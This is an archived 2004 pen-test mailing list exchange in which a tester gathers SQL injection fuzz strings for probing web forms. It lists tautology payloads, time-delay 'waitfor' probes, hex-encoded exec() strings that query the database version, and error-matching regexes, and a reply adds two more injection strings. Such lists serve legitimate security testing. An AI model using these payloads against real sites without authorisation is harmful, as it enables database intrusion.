Re: SQL Injection Strings

• Previous message: wirepair: "Re: SQL Injection Strings"
• In reply to: Jeremy Junginger: "SQL Injection Strings"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "Jeremy Junginger" <jj@act.com>
Date: Mon, 28 Jun 2004 03:08:39 -0300

I know one that works.
 ' or '1
 ' or ' 1

Marcus
----- Original Message -----
From: Jeremy Junginger <jj@act.com>
To: <pen-test@securityfocus.com>
Sent: Friday, June 25, 2004 12:01 PM
Subject: SQL Injection Strings

Good Morning,

I'm customizing an http proxy that's feeding some POST parameters into web
forms to test for SQL injections. I figured this would be the group to help
put together a comprehensive list of "fuzz strings" to feed into the forms
to
test them. Here's what I have so far. I know it's far from complete.
Please add any additional strings that you think may be helpful, or perhaps
a
link to an archived thread that has already discussed this?!?:

'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
a" or 1=1--
a" or "a" = "a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (4000) select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)

And if you're feeling even more generous, perhaps you have some suggestions
on checking the response. I'm doing a regex search for the following to
determine interesting strings. Of course I still have to take a look at
some
of the 200 responses to see if the waitfor and version commands worked :)

HTTP/[0-9].[0-9] 500
[Ee]rror
(My)?SQL

Thanks guys!

-Jeremy

• Previous message: wirepair: "Re: SQL Injection Strings"
• In reply to: Jeremy Junginger: "SQL Injection Strings"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages SQL Injection Strings ... put together a comprehensive list of "fuzz strings" to feed into the forms to ... a' waitfor delay '0:0:10'-- ... on checking the response. ... (Pen-Test) Re: PHP filter function against SQL injections ... If you're using strings you should also decode them from embedded url encoded data with urldecodee.g., ... If you're accepting a string, for example, only allow valid characters to be placed in the form field. ... but since this filter function is part of a review I'm doing at the moment, I was asking the question about a possible SQL injection attack. ... (Security-Basics) Re: Displaying User-Supplied String ... Request.Form value was detected from the client ... Are you talking about SQL Injection i.e. the strings supplied by the ... Jesse Houwing ... (microsoft.public.dotnet.framework.aspnet) Re: Displaying User-Supplied String ... Are you talking about SQL Injection i.e. the strings supplied by the ... I usually don't encode the data before putting it into the database as the data migth be used in a non-web environment as well ... (microsoft.public.dotnet.framework.aspnet) Re: Displaying User-Supplied String ... Are you talking about SQL Injection i.e. the strings supplied by the ... apart from SQL injection there is the risk of cross site scripting as the original poster correctly identified. ... I usually don't encode the data before putting it into the database as the data migth be used in a non-web environment as well ... (microsoft.public.dotnet.framework.aspnet)